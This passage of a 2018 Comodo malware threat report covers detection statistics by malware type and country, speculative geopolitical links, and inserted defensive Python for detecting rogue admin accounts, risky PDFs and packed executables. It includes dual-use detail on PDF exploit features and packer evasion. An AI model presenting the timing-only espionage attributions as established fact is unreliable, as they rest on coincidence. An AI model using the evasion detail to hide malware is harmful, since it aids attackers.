      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 40 of 73

51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing the planet for over a decade, ranked as the top worm, followed by Conficker, Nimda and more than 300 other families.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm detections.

Finally, the timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), while Russian worm detections were spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote drive or file server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected. Microsoft describes Allaple as a "multi-threaded polymorphic" worm that can also perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, while French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms spread by mailing copies of themselves, usually as an attachment or a link, to addresses harvested from an infected machine. They are nasty because many variants can also travel between victim computers by other means, for example via software exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

The timeline shows the primary Email Worm outbreaks during Q2 2018: Russia experienced frequent Email Worm activity, Germany had the deepest concentration at the beginning of June, and Poland had the sharpest spike toward the end of Q2.

5.1.4 P2P Worms

A peer-to-peer (P2P) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files, including unauthorized copies of books and films, and attackers take advantage of this to disseminate malware disguised as popular downloads.

Polip was the most common P2P worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella P2P protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of P2P worm detections in Q2 2018.

The timeline shows that Russia did not suffer from just one P2P worm outbreak, but many.

5.1.5 IM Worms

Social media accounts can also be used to spread malware. One type of computer worm, known as an "IM" (instant messaging) worm, sends malicious links through the messaging features of sites such as Facebook, either manually or automatically, from accounts it has compromised.

During Q2 2018 most of the IM worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM worm was a variant of Yahos, a well-known IM worm whose use to spread banking malware via social networks led the FBI to arrest 10 people in 2012.

The timeline shows that while Comodo did not detect many IM worms, they were nonetheless detected throughout Q2 2018 in various parts of the world, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. Once installed on a system or network, however, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be a separately installed program or a modification to an existing legitimate program.

The most common backdoor that Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is now fully 10 years old. DarkComet lets an attacker control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's backdoor detections in Q2.

The UK's backdoor challenges are also apparent in the timeline. Expect a closer analysis of this British backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot move to another computer unless a user carries the infected file there or performs some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top virus for Q2 2018. Microsoft rates Ramnit as a "severe" threat: it infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries, especially developing countries, were affected.

The timeline shows that Ukraine experienced two significant virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the wooden horse of Greek mythology because their malicious functionality is hidden within seemingly useful or benign programs. Typically a trojan grants a remote attacker the same rights and privileges as the local user who ran it, and it can be used for many kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds that account to the Administrators group as a "Remote Service Account".
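The account-creation behavior attributed to Starter above is also something a defender can hunt for directly. The following Python is an added example, not code from this report or from Comodo: it correlates two Windows Security log events, 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group), and raises an alert when a freshly created account lands in the local Administrators group (well-known SID S-1-5-32-544) within a short window. The event records, account names and SIDs are constructed for the demonstration; the field names follow the Security log's own naming, and the trusted_creators allowlist is an assumed local policy, not something the report describes.

```python
from datetime import datetime, timedelta

# Well-known SID of the local Administrators group and the two Security-log
# event IDs involved (4720 = user account created, 4732 = member added to a
# security-enabled local group).
ADMINISTRATORS_SID = "S-1-5-32-544"
EVENT_USER_CREATED = 4720
EVENT_LOCAL_GROUP_MEMBER_ADDED = 4732


def correlate_admin_creation(events, trusted_creators=frozenset(),
                             window=timedelta(minutes=10)):
    """Return one alert per new account that was added to Administrators
    within `window` of its creation.

    `events` are dicts carrying the Security log's own field names
    (SubjectUserName, TargetUserName, TargetSid, MemberSid, ...), a numeric
    `id` and an ISO-8601 `time`.  A creator outside `trusted_creators`
    makes the alert "high"; a trusted creator still gets "medium", because
    a hijacked admin session looks identical in the log.
    """
    created = {}   # TargetSid of a 4720 -> that event
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == EVENT_USER_CREATED:
            created[ev["TargetSid"]] = ev
        elif (ev["id"] == EVENT_LOCAL_GROUP_MEMBER_ADDED
              and ev["TargetSid"] == ADMINISTRATORS_SID):
            origin = created.get(ev["MemberSid"])
            if origin is None:
                continue  # pre-existing account promoted; out of scope here
            delta = (datetime.fromisoformat(ev["time"])
                     - datetime.fromisoformat(origin["time"]))
            if delta > window:
                continue
            severity = "medium" if origin["SubjectUserName"] in trusted_creators else "high"
            alerts.append({
                "account": origin["TargetUserName"],
                "sid": ev["MemberSid"],
                "created_by": origin["SubjectUserName"],
                "promoted_by": ev["SubjectUserName"],
                "seconds": delta.total_seconds(),
                "severity": severity,
            })
    return alerts


# Constructed sample events (not real log data).  Three accounts are created;
# only two of them are promoted to Administrators, one by an untrusted user.
SAMPLE_EVENTS = [
    {"id": 4720, "time": "2018-06-04T09:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1-2-3-1101"},
    {"id": 4732, "time": "2018-06-04T09:01:00", "SubjectUserName": "helpdesk",
     "MemberSid": "S-1-5-21-1-2-3-1101", "TargetUserName": "Remote Desktop Users",
     "TargetSid": "S-1-5-32-555"},
    {"id": 4720, "time": "2018-06-04T14:02:10", "SubjectUserName": "alice",
     "TargetUserName": "svc_remote", "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"id": 4732, "time": "2018-06-04T14:02:11", "SubjectUserName": "alice",
     "MemberSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "Administrators",
     "TargetSid": ADMINISTRATORS_SID},
    {"id": 4720, "time": "2018-06-04T16:00:00", "SubjectUserName": "itadmin",
     "TargetUserName": "contractor1", "TargetSid": "S-1-5-21-1-2-3-1106"},
    {"id": 4732, "time": "2018-06-04T16:03:00", "SubjectUserName": "itadmin",
     "MemberSid": "S-1-5-21-1-2-3-1106", "TargetUserName": "Administrators",
     "TargetSid": ADMINISTRATORS_SID},
]

if __name__ == "__main__":
    for a in correlate_admin_creation(SAMPLE_EVENTS, trusted_creators={"itadmin"}):
        print(f"[{a['severity']}] {a['account']} created by {a['created_by']} "
              f"and added to Administrators {a['seconds']:.0f}s later")
```

To run this against real data, export the two event IDs from the Security log (for example with Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720,4732}), map each record's EventData fields into the same dictionary shape and pass in the list. Alerts come back ordered by time with the creator, the promoter and the delay between the two events; a delay of a second or two is the signature of an automated tool, while a human administrator usually takes minutes.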

The bubble chart shows that Germany (de) was the number one country for trojans according to Comodo detections.

The timeline shows when this huge trojan infestation took place: at the beginning of June 2018.

5.2.4 Exploits

Exploits are pieces of software, chunks of data or sequences of commands that take advantage of existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections can be comparatively rare, because the vulnerabilities they rely on are typically patched soon after they are discovered, after which the exploit only works against systems that have not been updated.

In Q2 2018 the majority of exploits that Comodo detected targeted a favorite attacker vehicle: Adobe Portable Document Format (PDF) files. The format was created in the early 1990s to present documents consistently, independent of application software, hardware and operating system. A PDF can also carry scripts, embedded files and automatic actions, which is what makes it attractive for exploit delivery.
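Because PDFs can carry scripts, embedded files and auto-run actions, static triage of a suspicious document starts with counting the name objects that enable them. The following Python is an added example, not the report's own tooling: it counts risky PDF names (/JavaScript, /JS, /OpenAction, /AA, /Launch, /EmbeddedFile and so on), undoes the #xx name escapes attackers use to hide them, looks inside FlateDecode streams where compressed object streams can conceal them, and returns a verdict. The sample document it builds is constructed for the demonstration and contains no exploit, only a JavaScript app.alert wired to an /OpenAction; the name list, the verdict labels and the rule that script plus an auto-run action is "suspicious" are choices of this example.

```python
import re
import zlib

# Name objects that indicate active content or auto-execution in a PDF.
# Their presence is not proof of an exploit, but a document that combines
# script with an auto-run action deserves sandbox analysis before opening.
RISKY_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
               b"/EmbeddedFile", b"/RichMedia", b"/URI", b"/ObjStm"]


def _normalize_names(data: bytes) -> bytes:
    """Undo the #xx hex escapes the PDF spec allows inside names, which
    malicious documents use to hide keywords (e.g. /J#61vaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def _inflate_streams(data: bytes) -> bytes:
    """Concatenate the plaintext of every stream that inflates as FlateDecode.
    Keywords hidden in compressed object streams are otherwise invisible."""
    chunks = []
    for m in re.finditer(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            chunks.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass   # not Flate-compressed (image data, other filters)
    return b"\n".join(chunks)


def count_risky_names(data: bytes) -> dict:
    """Count each risky name in the raw file and in its inflated streams."""
    text = _normalize_names(data) + b"\n" + _normalize_names(_inflate_streams(data))
    counts = {}
    for name in RISKY_NAMES:
        # Trailing lookahead stops /JS from also matching /JSFoo, and
        # /EmbeddedFile from matching the harmless /EmbeddedFiles name tree.
        hits = len(re.findall(re.escape(name) + rb"(?![A-Za-z])", text))
        if hits:
            counts[name.decode()] = hits
    return counts


def triage(data: bytes) -> tuple:
    """Return (verdict, counts). 'suspicious' = script plus an auto-run or
    launch action; 'review' = any risky name present; 'clean' = none."""
    counts = count_risky_names(data)
    has_script = "/JavaScript" in counts or "/JS" in counts
    auto_run = any(k in counts for k in ("/OpenAction", "/AA", "/Launch"))
    if has_script and auto_run:
        return "suspicious", counts
    return ("review" if counts else "clean"), counts


def build_sample_pdf(malicious: bool = True) -> bytes:
    """Constructed sample (not a real exploit).  The malicious variant has an
    /OpenAction that runs JavaScript, an obfuscated name, and a Flate-compressed
    stream hiding a second JavaScript action."""
    objs = [
        b"1 0 obj << /Type /Catalog /Pages 2 0 R"
        + (b" /OpenAction 4 0 R" if malicious else b"") + b" >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj",
    ]
    if malicious:
        hidden = zlib.compress(b"<< /S /JavaScript /JS (app.alert('hidden')) >>")
        objs.append(b"4 0 obj << /S /J#61vaScript /JS (app.alert('open')) >> endobj")
        objs.append(b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(hidden)
                    + hidden + b"\nendstream\nendobj")
    return b"%PDF-1.4\n" + b"\n".join(objs) + b"\ntrailer << /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    print(triage(build_sample_pdf(malicious=True)))
    print(triage(build_sample_pdf(malicious=False)))
```

On the constructed sample the counts come out as two /JavaScript and two /JS hits (one pair in the obfuscated object, one pair inside the inflated stream) plus one /OpenAction, which is enough for the "suspicious" verdict; a real triage pipeline would follow this with object-level parsing of the flagged document, since counting names is a filter, not a decision.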

Japan and India were the two countries where Comodo detected the majority of exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Constructors, Packers, Email Flooders, Virtual Tools and Jokes.

5.3.1 Constructors

Constructors are applications that generate malware files automatically, so that an operator can produce new variants without writing any code.

In Q2 Alamar was the number one constructor that Comodo detected. Microsoft rates this program as a "Severe" threat to PC users.

In Q2 Germany (de) was the top country of detection for constructors.

The timeline shows not only that Germany had a serious problem with constructors in Q2 but also that this malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing or "packing" it inside a larger, seemingly innocuous program or data stream. The hostile code can even take the form of scripts. The packed file usually carries a small decompression stub, or is a self-extracting archive, which recreates the original code from the compressed data in memory and then executes it. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.

MUPX, a Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous file formats and operating systems and uses the open-source UCL compression library, whose decompressor is only a few hundred bytes of code. The "modified" variants detected here are UPX builds that have been altered, typically by renaming the UPX0/UPX1 sections or changing the decompression stub, so that the stock UPX tool can no longer unpack the file, which slows down analysis.
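A quick way to tell a packed executable from a normal one, and to see why a modified UPX defeats a name-only check, is to read the PE section table and measure each section's entropy. The following Python is an added example, not code from this report or from the UPX project: it parses the section headers, flags known packer section names, high-entropy sections, and an empty section with a large virtual size (the space a UPX stub unpacks into), and runs the check over three constructed in-memory PE layouts: an unpacked one, a stock-UPX one, and a "modified" one with the UPX0/UPX1 names scrubbed. The packer name list, the 7.0 entropy threshold and the sample layouts are assumptions of this example, and the built files are minimal header-plus-section images, not runnable programs.

```python
import math
import random
import struct

# Section names that stock packers leave behind.  Renaming them is exactly
# what "modified UPX" builds do, so the name check alone is not enough.
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".petite",
                         ".vmp0", ".vmp1", ".MPRESS1", ".MPRESS2", ".themida"}

def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte, 0.0 to 8.0.  Compressed or encrypted data
    sits near 8; ordinary x86 code and text sit well below 7."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(pe: bytes) -> list:
    """Walk the PE section table; return name, sizes and entropy per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(n_sections):
        name, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "vsize": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(raw)})
    return sections

def assess_packing(pe: bytes) -> dict:
    """Combine three indicators: known packer section names, high-entropy
    sections, and an empty section reserved for the unpacked image."""
    reasons = []
    for s in parse_sections(pe):
        if s["name"] in KNOWN_PACKER_SECTIONS:
            reasons.append(f"{s['name']}: known packer section name")
        if s["raw_size"] >= 1024 and s["entropy"] > 7.0:
            reasons.append(f"{s['name']}: entropy {s['entropy']:.2f}")
        if s["raw_size"] == 0 and s["vsize"] >= 0x1000:
            reasons.append(f"{s['name']}: no raw data but {s['vsize']:#x} bytes "
                           "virtual size (unpacking target)")
    return {"packed": bool(reasons), "reasons": reasons}

def build_pe(sections) -> bytes:
    """Build a minimal PE layout (constructed for the demo; not executable)
    from (name, raw_bytes, virtual_size) tuples."""
    opt_size = 0xE0
    n = len(sections)
    header_len = 64 + 4 + 20 + opt_size + 40 * n
    raw_ptr = (header_len + 0x1FF) & ~0x1FF            # first raw data offset
    table, blobs = b"", b""
    for name, raw, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, 0x1000,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        blobs += raw
        raw_ptr += len(raw)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)     # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    header = dos + b"PE\0\0" + coff + b"\0" * opt_size + table
    return header.ljust((header_len + 0x1FF) & ~0x1FF, b"\0") + blobs

def _pseudo_compressed(n: int = 4096) -> bytes:
    """Deterministic high-entropy bytes standing in for a compressed payload."""
    rng = random.Random(2018)
    return bytes(rng.getrandbits(8) for _ in range(n))

def sample_unpacked() -> bytes:
    code = bytes(range(0x20)) * 128          # 32 distinct bytes -> entropy 5.0
    data = b"constructed sample string\0" * 64
    return build_pe([(".text", code, len(code)), (".data", data, len(data))])

def sample_upx() -> bytes:
    return build_pe([("UPX0", b"", 0x10000), ("UPX1", _pseudo_compressed(), 4096)])

def sample_modified_upx() -> bytes:
    """Same layout as stock UPX, but with the tell-tale section names scrubbed."""
    return build_pe([(".text", b"", 0x10000), (".rsrc", _pseudo_compressed(), 4096)])

if __name__ == "__main__":
    for label, pe in (("unpacked", sample_unpacked()), ("upx", sample_upx()),
                      ("modified upx", sample_modified_upx())):
        print(label, assess_packing(pe))
```

The modified sample still trips two of the three indicators even though no section is called UPX0 or UPX1, which is the practical point: section-name signatures catch lazy packing, but entropy and the empty-section-with-large-virtual-size pattern catch the renamed builds that the stock unpacker cannot handle.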

In Q2 2018 Russia was the number one home of malware packer detections.

The timeline shows that Russia had the most persistent packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooders

Email flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one email flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country in which Comodo detected this behavior was Germany.

The timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files so that they avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

The timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are intended only as humor, or to annoy the user for a brief period.

Such malware is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for joke malware.

The timeline shows that this malware type is not numerous, but it is still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous precisely because users often download and run such software on purpose. Comodo nevertheless detects and flags these applications because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of applications.

Finally, the timeline shows that, far from being rare, such software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application category is alarming because users often install these applications inadvertently during ordinary computer and Internet activity. Examples include common adware programs and widely distributed images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, change the search provider and/or perform other actions the user might not have intended. Such bundles include free toolbars, adware and "system optimizers".

As the bubble chart shows, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

As the timeline shows, this type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft products. Such programs are referred to as "hacktools" and are often distributed together with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are number 2 and number 3 respectively.

The timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the number one malware family for each vertical's top malware type.

Let us take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was originally created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. One caveat when reading these figures: "Kryptik" is also a generic detection name that some antivirus vendors apply to heavily obfuscated or packed trojans, so detections sharing the label are not necessarily a single code family.

Second, "Zbot", another name for the "Zeus" trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and more than a decade later Zbot is still the top trojan in the government and transportation verticals. The Zeus botnet has been estimated at millions of compromised machines around the world, making it one of the largest on the Internet.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing, sometimes supported by a social engineering scheme that falsely claims the target's computer is already infected with a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Further, strategic analysis like this can be used to build a unique malware profile for each vertical, providing cyber intelligence that clarifies the primary malware threats and focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out in the data (note that this date falls in Q1, before the quarter covered by the rest of this report). What happened on that day in the US that might explain the surge in malware activity? On March 13 US President Donald Trump announced a new Secretary of State, Mike Pompeo, and a new CIA Director, Gina Haspel. In that light, one plausible reason for the rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, comprising many requests for information about upcoming changes in US political, military and intelligence activities, and immediately began to fulfill them via computer intrusion, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes. This is an inference from timing alone; the detection data itself does not attribute the activity to any actor.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo's trojan horse detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that some person or institution was briefly more connected to the Internet than usual, or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo researched the detected malware further and identified it as Windows activation ("cracking") software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that almost all activities, from social life to business, politics and national security affairs, are now conducted largely online. This is especially true during a national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. This timeline provides an example: Armenia's 2018 political revolution coincided with Comodo's largest volume of malware detections within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". This timeline, showing Comodo's virus and trojan detections in Belarus in Q2 2018, offers a case in point. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with electoral events. In mid-April Iraq was preparing for a national election, which included the problem of how best to secure its electronic dimension. And at the beginning of July (just after the close of Q2) Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be more than one. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.

7.9 Croatia

Since the cyberattacks that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 (a date before Q2 proper) is interesting, as it came just one day after the Russian government called Croatia's decision to expel a Russian diplomat (in solidarity with London over the poisoning of a former Russian spy in England, which London attributed to Russia) an "act of hostility".

7.10 Finland, Russia, USA

Finally, consider Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity placed it almost exclusively in Vantaa, the Helsinki suburb that hosts Helsinki-Vantaa airport, through which the summit delegations would arrive (the summit itself was held at the Presidential Palace in central Helsinki).

8 Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but also suggest possible future cybersecurity scenarios.

